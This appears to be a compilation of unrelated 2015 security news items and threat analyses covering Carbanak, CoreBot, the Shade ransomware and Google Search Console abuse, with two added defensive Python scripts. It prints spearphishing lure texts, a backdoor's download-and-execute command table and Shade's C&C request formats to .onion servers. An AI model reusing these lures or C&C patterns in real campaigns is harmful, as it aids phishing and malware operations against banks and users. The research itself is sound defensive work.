It is worth adding a few words about technologies that protect against false positives when scanning web resources. Kaspersky Security Network can track a resource’s reputation history. If malicious content is detected on one of the site’s pages, whether the site will be blocked completely or partially depends on its reputation. If the site has an impeccable reputation, Kaspersky Lab solutions will only block the page that poses a threat to users rather than the entire website.

Kaspersky Security Network also tracks the history of web resource hits. If a site that is popular with users is identified as dangerous, the automatic system will alert analysts, who will do an additional check. This helps to prevent false detections of popular resources.


False detections by security products are unavoidable – there are no ideal solutions. However, it is the objective of vendors to reduce them to a minimum. This is a feasible task.

Kaspersky Lab experts carefully monitor the operation of protection technologies to prevent them from making errors. For each type of object in which a threat can potentially be found (web pages, files, banners, boot sectors, traffic streams, etc.), there are special mechanisms designed to prevent false positives and separate collections of objects known to be clean.

Kaspersky Lab has a dedicated group responsible for improving existing methods of fighting false positives and developing new ones. It investigates each case, analyzes why a false detection occurred and creates tools that help to prevent similar errors in the future.

It is largely thanks to the efforts of this group that virtually no false positives have come up lately in tests of Kaspersky Lab products carried out by independent researchers.

Lasers can ‘immobilize driverless cars’


The laser technology used in driverless cars can be manipulated by attackers on a shoestring budget, allowing them to gain control of these vehicles, it has been revealed.
Speaking to the online technology news provider IEEE Spectrum recently, Jonathan Petit, principal scientist at Security Innovation, said that he has developed a way of getting into the system that allows autonomous cars to “see”.
The cost of doing so? According to Dr. Petit, cybercriminals can put together a homemade kit that will set them back roughly $60 (approximately £40). As he noted, “it’s really off the shelf”.
LiDAR, short for Light Detection And Ranging, is a type of technology that uses “light sensors to measure the distance between the sensor and the target object”.
It has been popular with manufacturers of self-driving cars, including the likes of Google – which has been instrumental in pioneering these futuristic vehicles – because it helps the onboard computer make sense of its environment, much like a human being.

However, the expert has found vulnerabilities within this system, flaws which demand a fundamental rethink of the technology behind it.
As it stands, a laser can be used to trick the onboard computer into thinking that objects are in front of it when the road is actually clear.
In turn, this deception will result in the vehicle automatically slowing down or even coming to a complete standstill. To all intents and purposes, the computer “sees” obstacles in its way.
“There are ways to solve it,” Dr. Petit continued in his interview with IEEE Spectrum. “A strong system that does misbehavior detection could crosscheck with other data and filter out those that aren’t plausible.
“But I don’t think carmakers have done it yet. This might be a good wake-up call for them.”
This is an important finding as driverless cars have been pitched as being safer and more efficient than traditional, human-controlled alternatives.

CoreBot Adds New Capabilities, Transitions to Banking Trojan


As researchers expected it would, CoreBot, the credential-stealing malware that surfaced last month, has added a bevy of new capabilities and reinvented itself as a robust banking Trojan.

Researchers said the malware shares more similarities with Dyre, another high profile banking Trojan, than a run of the mill data-stealing Trojan.

Perhaps the malware’s most telling characteristic is a new list of 55 URL triggers – triggers that researchers at IBM’s Security Intelligence claim are tied to a handful of online banking sites in the U.S., Canada, and the U.K. and can launch webinjects.

When the firm first published research on CoreBot late last month, researchers noted the malware’s flexibility, acknowledging its modular design as something that could potentially allow for the easy addition of new mechanisms later down the line.

Turns out, it didn’t take long for developers behind the malware to up the Trojan’s ante.

Similar to Trojans such as Zeus, Dyre and Dridex, CoreBot steals victims’ login information, then tries to trick them into giving away more.

“In its previous version, CoreBot was only defined as an information stealer because it did not possess the capabilities that would enable it to steal username and password combinations in real time from the victim’s browser. This has changed, and CoreBot now hooks the three most popular browsers — Google Chrome, Mozilla Firefox and Internet Explorer — to be able to monitor browsing, steal data and apply webinjections,” Limor Kessem, a Cybersecurity Evangelist with IBM, wrote of the malware last week.

According to Kessem, the malware uses a more-advanced, custom-made webinjection mechanism designed for banking credential theft. The malware has also incorporated a slew of other traits specific to banking Trojans such as man-in-the-middle capabilities, a VNC (virtual networking computing) module, and real-time form grabbing.

Now that the malware has matured into a full-fledged banking Trojan, speculation is mounting over whether some of the information it steals is being sold online. In particular, researchers are wondering whether a recently registered, suspicious-looking marketplace is peddling stolen CoreBot information.

Researchers with Damballa observed a sample of CoreBot last week communicating with a domain registered to a specific email address, drake.lampado777[at]gmail[.]com, that was also used to set up another domain, btcshop. Btcshop is being used to sell SOCKS (Socket Secure) proxies and other personally identifiable information (PII), which has led some researchers at the firm to believe there is a relationship between the two.

Researchers with Damballa also noticed two other domains communicating with the same IP address: one used as a Carberp command and control server and another hosting the TVSPY remote access tool (RAT). But it was btcshop, set up on July 30, that caught their attention the most.

While it’s a tenuous connection — Damballa isn’t completely certain the same person running CoreBot is the same person running TVSPY — the researchers insist it’s plausible.

“It would be convenient for the same person or a small group of people to be running malicious domains registered under the email and also running btcshop to sell their collected wares,” a blog entry on the company’s Day Before Zero Blog theorized on Friday.

Top tips on safe online banking from the comfort of your home


Banking online from the comfort of your own home may sound safe, but it doesn’t mean you are immune from attack. We look at what you need to do to reduce the chances of opportunistic attackers accessing your banking records and stealing your money.
Two-step verification
Two-factor authentication is for some users a relatively new and emerging trend, but it’s something that the banks have been aware of for some time.
Most banks have long asked their customers to enter a customer password and PIN to log into their accounts, but there is now a move to issuing debit or credit card readers so users can log into their accounts and/or authorize transactions.
For example, if you’re paying someone for the first time, you might be asked to confirm the payment details via the card reader, and to enter a small code on both the web page and card reader to verify that you are the rightful owner of that bank account.
If you don’t have one of these readers, ask your bank where you can get one.
The locked padlock sign – or unbroken key symbol – should always appear in your browser window when banking online, as this indicates you are using a secure HTTPS web connection that cannot be compromised or spied on. You should also see HTTPS at the start of the visited website address.
HTTP websites are still relatively safe, but because the connection is not encrypted, it could potentially be cracked in a man-in-the-middle (MiTM) attack, where an attacker looks to impersonate a trusted party in order to intercept data. Sometimes they do this by pretending to be the certificate authority (CA) issuing the digital certificate for the web address, while other attacks may see them set up a fake Wi-Fi hotspot, and so on.
Password protect your Wi-Fi
A basic first step in any type of online security is making sure your own Wi-Fi is password-protected so no nefarious actors can hijack your web sessions.
You should create a password that is unique, strong and ideally comprises upper case and lower case letters as well as numbers and symbols.
This advice also applies to your router. Many users never change the default administrative password set by the internet service provider (ISP), which could result in someone connecting to the network and changing the router settings to direct you to rogue websites. They could also set up spoofed Wi-Fi hotspots in the hope that you would connect to them.
Only use trusted sources
You should always visit your bank online by using official applications or by typing its web address into a search engine. You should avoid clicking links claiming to direct you to the site, especially if they arrive via social media or email, as these webpages – which may even look like the official page – could be trying to steal your login credentials.
You should also be wary of unsolicited emails or phone calls asking for the PIN or password to your account. Your bank would never ask for these details in full, and certainly not over the phone or by email.
Keep browsers and software up-to-date
Most cyberattacks start with ‘low hanging fruit’ – easy wins for the attacker – which includes common human error, like using weak passwords or running outdated software with bugs that can be exploited.
Outdated internet browsers have been found to have various zero-day vulnerabilities – flaws with no immediate fix – and the same is true of Adobe’s Flash Player and other widely-used software.
Cybercriminals will often look to exploit these vulnerabilities to find a way into your machine to wreak havoc.
In which case, make sure your browser is always running the latest version, and that you regularly download updates for all software running on your computer. Most modern software will check for updates automatically so you may want to install them as they become available.
Install a security solution on your devices
Antivirus software protects you, your privacy and your money by scanning for and removing malware, trojans, spyware and adware, which can take over your PC and steal from you.
In order to work effectively, security solution software has to download updates regularly over the internet to keep up with the threats. Out-of-date software will have flaws, and won’t be as useful.
Think who might have access to your computer
If you flat-share or live with friends, family or work colleagues, you should think carefully about what they could potentially see.
For example, if you share laptops, iPads or Android tablets, you should ensure multi-user accounts are enforced, with separate passwords too. And if you own your own laptop you need to be wary of ‘shoulder surfers’ viewing your screen from behind.
Also, ask yourself if you need a privacy screen filter, a laptop lock or other accessories that can protect against digital and physical theft.
Log out when you finish with online banking
It may sound simple, but it’s always a good idea to log out of your online banking session when you’ve done what you needed to. This significantly reduces the chances of that session being hijacked.
Most banks will log you out after a few minutes anyway, but why take the risk when you can do it yourself?
Set up notifications to alert you to what’s happening
Some banks now offer a facility so that customers can set up text or email notifications to alert them to certain activities on their account. For example, if a withdrawal matches or exceeds a specified amount or the account balance drops below a certain point then a message will be sent.
These alerts could be a useful way of spotting any suspicious activity on your account.

Carbanak gang is back and packing new guns


The Carbanak financial APT group made the headlines when Group-IB and Fox-IT broke the news in December 2014, followed by the Kaspersky report in February 2015. The two reports describe the same cybercriminal gang which stole up to several hundreds of millions of dollars from various financial institutions.
However, the story is interesting not only because of the large amount of money stolen but also from a technical point of view. The Carbanak team does not just blindly compromise large numbers of computers and try to ‘milk the cow’ as other actors do, instead they act like a mature APT-group. They only compromise specific high-value targets and once inside the company networks, move laterally to hosts that can be monetized.
A few days ago CSIS published details about new Carbanak samples found in the wild.
In this blog we will describe the latest developments in the Carbanak story.
Casino hotel hack

At the end of August, we detected an attempt to compromise the network of a casino hotel in the USA. The infection vector used in this attack may have been a spearphishing e-mail with a malicious attachment using an RTF-exploit or .SCR file. The attackers’ aim was to compromise PoS servers used in payment processing.
The main backdoor used by attackers was the open-source Tiny Meterpreter. In this case, however, the source was modified – the process injection to svchost.exe was added to its functionality.
This Tiny Meterpreter backdoor dropped two different malware families:
Win32/Spy.Sekur – well known malware used by the Carbanak gang
Win32/Wemosis – a PoS RAM Scraper backdoor
As mentioned here by our colleagues from TrendMicro, Carbanak malware is capable of targeting Epicor/NSB PoS systems, while Win32/Wemosis is a general-purpose PoS RAM Scraper which targets any PoS that stores card data in the memory. The Wemosis backdoor is written in Delphi and allows the attacker to control an infected computer remotely.
Both executables were digitally signed with the same certificate:
The certificate details:
Company name: Blik
Validity: from 02 October 2014 to 03 October 2015
Thumbprint: 0d0971b6735265b28f39c1f015518768e375e2a3
Serial number: 00d95d2caa093bf43a029f7e2916eae7fb
Subject: CN = Blik
O = Blik
STREET = Berzarina, 7, 1
L = Moscow
S = Moscow
PostalCode = 123298
C = RU
This certificate was also used in the digital signature of a third malware family used by the same gang: Win32/Spy.Agent.ORM.
Win32/Spy.Agent.ORM – overview
Win32/Spy.Agent.ORM (also known as Win32/Toshliph) is a trojan used by the Carbanak gang as one of their first-stage payloads. The binary of the testing version was signed with a Blik certificate; moreover, Spy.Agent.ORM shares some code similarities with “the regular” Carbanak malware.
The Win32/Spy.Agent.ORM malware family is already known in the industry because of two blogposts. In July 2015 the security company Cyphort reported the compromise of a news portal and a banking site, and it turned out that the compromised sites served Win32/Spy.Agent.ORM. After that, Blue Coat reported a spearphishing attempt targeting Central Bank of Armenia employees, with the same payload.
This malware appeared on our radar at the beginning of summer 2015, and afterwards we started to track it.
We have seen attempts to attack various companies in Russia and Ukraine using spearphishing e-mails that have malicious attachments consisting of .SCR files or .RTF exploits.
Here is an example of a spearphishing email sent to one of the biggest Forex-trading companies:
Roughly translated from Russian to English, it says:
“Due to the high volatility of the ruble exchange rate the Bank of Russia sends rules of trading on the currency market. Password the attached document: cbr”
Here is another example of a spear phishing attempt. Email with this text was sent to the largest electronic payment service in Russia:
By order of Roskomnadzor dated 04.08.2015 you are required to block materials falling under Federal Law No. 152-FZ of 27.07.2006 (as amended on 21.07.2014) “On Personal Data”. The list of materials is in the document.
Password roscomnadzor
Another rough translation from Russian to English:
“According to Roscomnadzor prescript you should block the materials, which you can find in the attachment. Password is roscomnadzor”
We have seen similar .SCR files with following filenames:
АО «АЛЬФА-БАНК» ДОГОВОР.scr (Alfabank contract)
Перечень материалов для блокировки от 04.08.2015г.scr (List to block)
Postanovlene_ob_ustranenii_18.08.2015.pdf %LOTS_OF_SPACES% ..scr
Правила Банка России от 06.08.2015.pdf %LOTS_OF_SPACES% .scr (Rules of Bank of Russia)
All these attachments contained a password protected archive with .SCR file. The files had Adobe Acrobat reader icon or MS Word icons.
In other cases attackers used RTF files with different exploits, including an exploit for one of the latest Microsoft Office vulnerabilities, CVE-2015-1770, which was patched by Microsoft in June 2015 in MS15-059.
We have seen RTF files with the following names used in attacks:
Բանկերի և բանկային գործունեության մասին ՀՀ օրենք 27.07.2015.doc (Armenian: The Law on Banks and Banking 27.07.2015)
АО «АЛЬФА-БАНК» ДОГОВОР.doc (Russian: Alpha-bank contract)
Anti-Money Laudering & Suspicious cases.doc
AML USD & Suspicious cases.doc
Amendment inquiry ( reference TF1518869100.doc
Information 2.doc
Here is example of a spearphishing message that was sent to a bank in the United Arab Emirates:
Here is example of a spearphishing email that was sent to a German bank:
Win32/Spy.Agent.ORM – Technical details

Win32/Spy.Agent.ORM is a small and simple backdoor that enables the attackers to assess the victim. When executed the trojan connects to a C&C server and receives commands to grab screenshots, enumerate running processes and get information about the system and campaign ID. Based on that information malware operator decides whether the infected computer is useful: that is, whether it’s the intended target or just a system that was accidentally infected.
Here is the list of commands it can receive from the C&C server:
Command Purpose
0x02 Collects information about computer: Computer Name, User Name, Windows Version, Architecture (32/64 bit) and campaign ID
0x03 Collects list of running processes
0x04 Downloads binary to %TEMP% and executes
0x05 Updates itself
0x06 Deletes itself
0x07 Makes screenshot
0x08 Loads binary in the memory, without dropping to the disk
The latest sample of this malware family found in the wild is also digitally signed, this time with a different certificate:
The certificate details:
Company name: In travel TOV
Validity: from 21 July 2015 to 21 July 2016
Thumbprint: 7809fbd8d24949124283b9ff14d12da497d9c724
Serial number: 00dfd915e32c5f3181a0cdf0aff50f8052
Subject: CN = In travel TOV
O = In travel TOV
STREET = prospekt Pravdi 33
L = Kiev
S = Kievskaja
PostalCode = 04108
C = UA
Also, the latest sample is able to gain system privileges via an exploit and install itself as a system service. The trojan attempts to exploit a vulnerability – CVE-2015-2426 in the OpenType manager module (ATMFD.dll) – which was patched by Microsoft in MS15-078. The exploit for this vulnerability was leaked in a Hacking Team dump.
The digital certificate for Blik used in this case is not the only link between Win32/Spy.Agent.ORM and Win32/Spy.Sekur (Carbanak malware). They share similarities in code – take a look at the function that generates the BOTID-value, for example:
The BOTID-value is a unique value generated on the basis of the hardware parameters of infected computer, and it’s used by attackers for computer identification. In both cases generation is based on the MAC-address and computer name and the resulting value is formatted using the wsprintf –function.
Sinkhole statistics

Our sinkhole of some C&C domains used by Win32/Wemosis has resulted in hits from bots in the following countries.

As the attacks are highly targeted, the total number of victims is low in absolute numbers. Victims in the USA are situated in several states, including Nevada (Las Vegas), California, and New York, and include casinos and hotels.

Even after it has reportedly stolen hundreds of millions of dollars, the infamous Carbanak APT group isn’t resting on its laurels. On the contrary, it is very active and keeps attacking specific targets related to the finance industry, including banks, Forex-trading companies, and even an American casino hotel. Recently, we have detected malware used by the Carbanak group in the following countries, among others:
United States of America
United Arab Emirates
As described in this blog post, the gang doesn’t use just one malware family to carry out its operations but several. While the code in the different families – Carbanak (Win32/Spy.Sekur), Win32/Spy.Agent.ORM, and Win32/Wemosis – is different it does contain similar traits, including the same digital certificate.
Furthermore, the attackers are updating their arsenal with the latest exploits, such as the Microsoft Office remote code execution vulnerability, CVE-2015-1770, or the zero-day exploit leaked in the Hacking Team dumps, CVE-2015-2426.
We continue to monitor the Carbanak threats. For any enquiries or sample submissions related to the subject, contact us at:
Indicators of Compromise (IoC)

Trojan.Win32/Spy.Sekur (Carbanak malware) SHA-1:
RTF-exploits SHA-1:
Trojan.Win32/Spy.Sekur C2 servers:
Trojan.Win32/Spy.Agent.ORM SHA-1:
RTF-exploits SHA-1:
Trojan.Win32/Spy.Agent.ORM – C2 Servers:
Tiny meterpreter SHA-1:
Win32/Wemosis (PoS RAM Scraper) SHA-1:
Win32/Wemosis – C2 server:

Dangerous flaws threaten home data storage

15.9.2015 Vulnerabilities
So-called NAS servers have been growing in popularity in recent years. In households in particular they are an ideal way to store data from several computers, tablets and smartphones on one centralized storage device. Yet, as has now emerged, security flaws can turn NAS servers into. The Czech National Security Team CSIRT has warned of flaws affecting NAS servers made by Synology. The holes are in the Video Station and Download Station applications.

Because of the flaws, an attacker can do practically anything with a compromised NAS server. “The vulnerability allows an attacker to run an arbitrary command as root (the system administrator, ed.) and so take over the entire device,” warned security analyst Pavel Bašta of the CSIRT team, which is operated by the CZ.NIC association.

Patches are already out
Fortunately, Synology has already released patches fixing these flaws. “Users should deploy the patches as soon as possible, because it can be expected that someone will again try to exploit the vulnerabilities,” Bašta added.

After all, cybercriminals targeted NAS servers last year too, when they spread a modified version of the CryptoLocker ransomware over the internet.

Updates can be downloaded directly on the affected NAS servers from the Package Center menu.

Crooks are abusing Google Search Console to remain under the radar


Experts at Sucuri have revealed that cybercriminals are abusing Google Search Console to hide their presence on compromised websites; administrators should take note.
Security experts at Sucuri have discovered that cybercriminals are increasingly abusing legitimate webmaster tools (Google Search Console) for black hat SEO and to hide their presence on compromised websites.


The operation is quite simple for crooks: they just need to upload an HTML verification file provided by Google to the hijacked website.


“When hackers get access to a website, it’s easy for them to create this file and verify themselves as an owner. Here is some further evidence from the forum:

Search Console Account Hacked: “An HTML verification file is being placed on my server in the root directory. I am not placing it there, and it’s not being placed there using my FTP account.”
Unauthorized verification of webmaster owners: “And in my site’s file manager, I spotted these whole verification HTML files just created recently, and I have deleted those unknown files.“
Usually these files are being uploaded via vulnerabilities in web applications or via backdoors that hackers install after breaking into websites. That’s why deleting the file and changing FTP passwords is usually not enough,” Sucuri explained.

With this trick, cyber criminals don’t need to hack the legitimate owner’s Google account to assign their profile the status of “owner” in the Google Search Console.

Google allows each website to have multiple owners, but when a new one is verified, all the other owners receive a notification email. The email is sent to alert them and allow them to revoke the new ownership in case of abuses. The problem is that if the legitimate owners don’t see the notification email, the attacker can revoke their status of “verified” owner so that they no longer receive any notifications.

In this way, attackers can hide their presence and avoid Google’s threat detection systems.

As explained by Sucuri, the problem is related to the lack of notification to the legitimate owners when they have been unverified.

The researchers have discovered many forum posts from webmasters of various websites who noticed multiple new owners being added to their Google Search Console accounts.

The experts at Sucuri recommend that webmasters verify ownership of all their websites, including their subdomains; a prompt response is an effective defense against such attacks.

Experts at Sucuri suggested the following verification methods to prevent attackers from easily unverifying your account:

Via a domain name provider;
Via a Google Analytics tracking code;
Via a Google Tag Manager container snippet.
Unlike the HTML file and the Meta tag verification methods, these three require hackers to have access to your Google and domain name registrar accounts in order to be able to unverify you.
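A defender-side check for the two weak methods named above, as an added example (not Sucuri's or Google's code): it lists any google<16 hex>.html verification file in the web root and any google-site-verification meta tag on the home page that is not on the owner-maintained allowlist. The allowlist values and the sample web root are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

# Google's HTML-file verification method places google<16 hex chars>.html in
# the site root; the meta-tag method adds a google-site-verification tag to
# the home page. Either can be planted by whoever controls the web root.
VERIFICATION_FILE = re.compile(r"^google[0-9a-f]{16}\.html$", re.IGNORECASE)
VERIFICATION_META = re.compile(
    r'<meta\s+name=["\']google-site-verification["\']\s+content=["\']([^"\']+)["\']',
    re.IGNORECASE,
)
INDEX_PAGES = ("index.html", "index.htm", "index.php")


def find_unknown_verifications(webroot, known_files=(), known_tokens=()):
    """Return [(kind, path, value)] for verification artifacts not on the allowlist.

    known_files: file names the site owner created; known_tokens: meta-tag
    content values the owner created. Anything else is reported for review.
    """
    root = Path(webroot)
    allowed_files = {name.lower() for name in known_files}
    findings = []
    for entry in sorted(root.iterdir()):
        if entry.is_file() and VERIFICATION_FILE.match(entry.name):
            if entry.name.lower() not in allowed_files:
                findings.append(("file", str(entry), entry.name))
    for name in INDEX_PAGES:
        page = root / name
        if page.is_file():
            for token in VERIFICATION_META.findall(page.read_text(errors="replace")):
                if token not in known_tokens:
                    findings.append(("meta", str(page), token))
    return findings


def build_demo_root():
    """Constructed web root: one legitimate verification file, one planted by an
    intruder, and a home page carrying one allowed and one unknown meta tag."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    legit = "google0123456789abcdef.html"   # constructed owner file name
    rogue = "googlefedcba9876543210.html"   # constructed intruder file name
    for fname in (legit, rogue):
        # Google's file format: a single line naming the file itself.
        (root / fname).write_text(f"google-site-verification: {fname}\n")
    (root / "index.html").write_text(
        "<html><head>\n"
        '<meta name="google-site-verification" content="ownerTOKEN-allowed">\n'
        '<meta name="google-site-verification" content="intruderTOKEN-unknown">\n'
        "</head><body>hello</body></html>\n"
    )
    return root, legit


def demo():
    root, legit = build_demo_root()
    return find_unknown_verifications(
        root, known_files=[legit], known_tokens=["ownerTOKEN-allowed"]
    )


if __name__ == "__main__":
    for kind, path, value in demo():
        print(f"UNKNOWN {kind} verification: {value} ({path})")
```

Run it periodically against the live web root with the real allowlist; any hit should be compared against the owner list shown in Search Console, since the post notes that the planted owner may already have unverified you.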

UK businesses ‘number one target for cybercriminals’


UK businesses are more likely to be the victim of cybercrime than their international counterparts, according to new data from ThreatMetrix.
Its analysis revealed that British enterprises were attacked more than twice as often as their US counterparts, from both domestic and international sources – the latter tending to be the US, Germany, Nigeria and Mexico.
While most cyberattacks globally originate in the US, the UK is not far behind with ThreatMetrix stating that it is “the second highest originator” of cybercrime.
Financial institutions were found to be the main target, with cybercriminals focusing their efforts on online lenders.
“Online lending is a hotbed for fraud because it is an insecure channel and targets the unbanked and underbanked population in developing countries —which tends to be a big target for attackers,” commented Dr. Stephen Moody, solutions director (EMEA) at ThreatMetrix.
“The more businesses and consumers turn to the digital space to store and manage their financial information, the more fraudsters will be on high alert—ensuring digital identities are effectively protected should be high priority for everyone.”
It was also revealed that during the second quarter of 2015, there was a “spike” in ecommerce-related cyberattacks in the UK. Attacks on financial services for this period remained steady.
Online fraud is an increasing concern for consumers across the world, so much so that many individuals would be willing to share their DNA with their banks to further secure their financial and personal data.
Earlier this year, a report by Telstra revealed that one in five respondents would feel comfortable in handing over their DNA if it meant they could feel confident about banking and managing their finances online.
“We found those with more to invest are more willing to ‘do what it takes’ to ensure security,” the Australian-based telecommunications and information services company outlined in its paper.
“A staggering 47 percent of those with a net worth of more than US $1 million would share their DNA profile with a financial provider.”

The Shade Encryptor: a Double Threat

14.9.2015 Source: Kaspersky

A family of ransomware Trojans that encrypts files and adds the extensions “.xtbl” and “.ytbl” emerged in late 2014/early 2015, and quickly established itself among the top three most widespread encryptors in Russia (along with Trojan-Ransom.Win32.Cryakl and Trojan-Ransom.BAT.Scatter). This threat has been assigned the verdict Trojan-Ransom.Win32.Shade according to Kaspersky Lab’s classification. The original name given to the encryptor by its creator is not known; other security vendors detect it as Trojan.Encoder.858, Ransom:Win32/Troldesh.

There has been no appreciable evolution of this Trojan over time – only the format of the encrypted file’s name, the C&C server addresses and the RSA keys have been changing.

There are two main methods used to deliver the malware to victims’ computers: spam messages and exploit kits (in particular, NuclearEK).

When delivered via spam, the user receives a letter with a malicious file attached. The system is infected when the user attempts to open the attachment. The following file names have been used when spreading Trojan-Ransom.Win32.Shade:

doc_dlea podpisi.rar
неподтвержден 308853.scr
documenti dlea podpisi 05.08.2015.scr.exe
akt sverki za 17082015.scr
It should be noted that the file name changes for each mass mailing campaign, so the potential file names are not limited to those listed above.

The second delivery mechanism – via exploit kit – is more dangerous because the infection occurs when the victim unwittingly visits a compromised website. It may be a site belonging to cybercriminals, or a legitimate resource that has been hacked. In most cases, the user is completely unaware of the danger the website poses. Malicious code on the website exploits a vulnerability in the browser or a plugin, and the Trojan is then covertly installed in the system. Unlike the spam delivery method, the victim doesn’t even have to run an executable file.

After Trojan-Ransom.Win32.Shade ends up in the system, it connects to a C&C server located in the Tor network, reports the infection and requests a public RSA-3072 key that is subsequently used to encrypt files (as discussed below). Should the connection attempt fail, the Trojan chooses one of the 100 public keys that are stored within its body for just such an eventuality.

The Trojan then starts encrypting files. While scanning for objects to encrypt, it uses the static list of extensions shown in the screenshot below.


When encryption is complete, a menacing image is set as the desktop background:


The Trojan leaves ransom demands in the files README1.txt, …, README10.txt. The contents of these files are always the same:


However, unlike most other encryptors, Trojan-Ransom.Win32.Shade doesn’t stop there. It doesn’t terminate its process, but instead starts an infinite loop in which it requests a list from the C&C server containing the URLs of additional malware. It then downloads that malware and installs it in the system. This sort of activity is typical of download bots. We have spotted malware from the following families being downloaded:

Trojan.Win32.CMSBrute (a more detailed description is provided below).
Below is the code for the download and listening loop:


It is therefore very important to run a complete anti-malware scan of the computer if the Shade encryptor (or the .xtbl, .ytbl files it creates) is detected. If left untreated, the system will most probably remain infected with several malicious programs downloaded by the encryptor.

Common features of Shade family Trojans

Written in C++ using STL and its own classes.
Statically linked with Tor client.
Uses boost (threads), curl, OpenSSL libraries.
Each sample has the URL of a C&C server hardcoded in it. A total of 10 C&C server addresses were identified in various samples, eight of which are currently active. All the C&C servers are located in the Tor network.
All strings (including the names of imported functions) are AES encrypted. They are decrypted when the program starts, then the import table is dynamically populated.
Prior to setting the new desktop background, the old one is saved in the registry.
Typically packed with UPX and an extra packer. Once unpacked, it is 1817 KB in size.
Creates 10 identical files named README1.txt, …, README10.txt on the victim computer, containing ransom demands in Russian and English.
A unique 256-bit AES key is generated to encrypt the contents and the name of each file. The encryption is done in CBC mode with a zero initialization vector.
Contains 100 public RSA-3072 keys with the public exponent 65537 (a total of 300 different public keys were detected in various samples).
Has the capability of downloading and launching malware.
The cryptographic scheme

Generating an infected computer ID

The Trojan obtains the computer name (comp_name) with the help of API function GetComputerName, and the number of processes (num_cpu) with the help of API function GetSystemInfo;
Using the serial number of the system volume, it calculates a 32-bit constant and converts it into a HEX string (vol_const);
Obtains data about the OS version (os_version) separated with the symbol “;” (e.g. “5;1;2600;1;Service Pack 3”);
Creates the string comp_namenum_cpuvol_constos_version;
Calculates the MD5 hash of this string;
Converts the MD5 hash into a HEX string and uses its first 20 characters as the computer’s ID.
Receiving key data

When the computer ID has been generated, the Trojan attempts to connect to the C&C server located in the Tor network, sends the computer ID to it and receives the public RSA key in return. If the connection attempt fails, one of the 100 public RSA keys hardcoded in the Trojan body is selected.

Encrypting files

The algorithm AES 256 in CBC mode is used to encrypt files. For each encrypted file, two random 256-bit AES keys are generated: one is used to encrypt the file’s contents, while the other is used to encrypt the file name. These keys are placed in the utility structure key_data, which is then encrypted with the selected RSA key (so it takes up 384 bytes after encryption) and placed at the end of the encrypted file:


In C syntax, this structure can be written as follows:


The Trojan attempts to rename the encrypted file using the result of the calculation Base64(AES_encrypt(original file name)).xtbl (e.g. ArSxrr+acw970LFQw.xtbl). Failing this, it simply adds the extension .ytbl to the original file name. In later versions, the Trojan adds the infected computer’s ID and then the extension .xtbl to the file name, e.g. ArSxrr+acw970LFQw.043C17E72A1E91C6AE29.xtbl.
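The ID derivation and the encrypted-file layout and naming rules described in the two sections above, implemented as an added triage helper for responders (this is example code, not Kaspersky's). It assumes the 32-bit vol_const, whose derivation the article does not give, is supplied as a hex string, and that the ID is upper-cased to match the IDs seen in file names.

```python
"""Added triage helper for Trojan-Ransom.Win32.Shade artefacts (not Kaspersky's
code). Implements the computer-ID derivation and the encrypted-file layout and
naming rules described in the article, so a responder can tell which .xtbl/.ytbl
files belong to this family and which host ID they carry."""
import hashlib
import re
from collections import Counter

RSA3072_BLOB_LEN = 384   # RSA-3072 ciphertext of key_data appended to each file


def shade_computer_id(comp_name, num_cpu, vol_const, os_version):
    """comp_name + num_cpu + vol_const + os_version -> MD5 -> first 20 hex chars.

    Assumptions: vol_const (derivation not given in the article) is passed in as a
    hex string; num_cpu is rendered as a plain decimal; the hex ID is upper-cased
    to match IDs seen in file names such as 043C17E72A1E91C6AE29.
    """
    payload = f"{comp_name}{num_cpu}{vol_const}{os_version}"
    return hashlib.md5(payload.encode("utf-8")).hexdigest().upper()[:20]


# File-name forms described in the article: Base64(AES(name)).xtbl, the later
# Base64(AES(name)).<20-hex host ID>.xtbl, and the fallback <original name>.ytbl.
_B64 = r"[A-Za-z0-9+/]+=*"
_XTBL_WITH_ID = re.compile(rf"^({_B64})\.([0-9A-Fa-f]{{20}})\.xtbl$")
_XTBL = re.compile(rf"^({_B64})\.xtbl$")
_YTBL = re.compile(r"^(.+)\.ytbl$")


def classify_name(filename):
    """Return {'variant', 'host_id', 'original_name'} or None if not Shade-like.

    original_name is only recoverable for .ytbl files; for .xtbl files the name
    is AES-encrypted with a per-file key that sits inside the RSA-encrypted blob.
    """
    m = _XTBL_WITH_ID.match(filename)
    if m:
        return {"variant": "xtbl-with-id", "host_id": m.group(2).upper(),
                "original_name": None}
    m = _XTBL.match(filename)
    if m:
        return {"variant": "xtbl", "host_id": None, "original_name": None}
    m = _YTBL.match(filename)
    if m:
        return {"variant": "ytbl", "host_id": None, "original_name": m.group(1)}
    return None


def split_encrypted_file(data):
    """Split an encrypted file into (aes_ciphertext, rsa_key_blob).

    The last 384 bytes are key_data encrypted with the RSA-3072 key; everything
    before them is the AES-256-CBC ciphertext of the original contents. The blob
    is what would have to be decrypted with the private key to recover the
    per-file AES keys. Raises ValueError when the file cannot have this layout.
    """
    if len(data) <= RSA3072_BLOB_LEN:
        raise ValueError("too short to hold ciphertext plus a 384-byte key blob")
    return data[:-RSA3072_BLOB_LEN], data[-RSA3072_BLOB_LEN:]


def triage_listing(filenames):
    """Count Shade-like files per naming variant and per embedded host ID."""
    by_variant, by_host = Counter(), Counter()
    for name in filenames:
        info = classify_name(name)
        if info is None:
            continue
        by_variant[info["variant"]] += 1
        if info["host_id"]:
            by_host[info["host_id"]] += 1
    return by_variant, by_host


if __name__ == "__main__":
    # Constructed sample listing; the host ID is the one quoted in the article.
    sample = [
        "ArSxrr+acw970LFQw.043C17E72A1E91C6AE29.xtbl",
        "Zm9vYmFyYmF6cXV4.043C17E72A1E91C6AE29.xtbl",
        "report.docx.ytbl",
        "README1.txt",
    ]
    print(triage_listing(sample))
    # Constructed host parameters, not a real machine.
    print(shade_computer_id("WORKSTATION-01", 2, "1A2B3C4D", "5;1;2600;1;Service Pack 3"))
```

Comparing the host ID embedded in file names against the ID computed from the machine's own parameters tells a responder whether the files were encrypted on that host or copied in from another one.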

Communication with a C&C server

The address of one C&C server is contained in the Trojan’s body. The servers are located in the Tor network and communication is established using a Tor client that is statically linked to the Trojan.

The sample sends the following requests to the C&C server:

Request for a new public RSA key:
GET http://<server>.onion/reg.php?i=ID&b=build&v=version&ss=stage
ID – the ID of the infected computer;
build – the ID of the specific Trojan sample;
version – the Trojan’s version (we encountered versions 1 and 2);
stage – the stage of encryption – request for a new public key or a message about completing file encryption.
Error message:
GET http://<server>.onion/err.php?i=ID&b=build&v=version&err=error
error – a base64-coded message about an error during encryption.
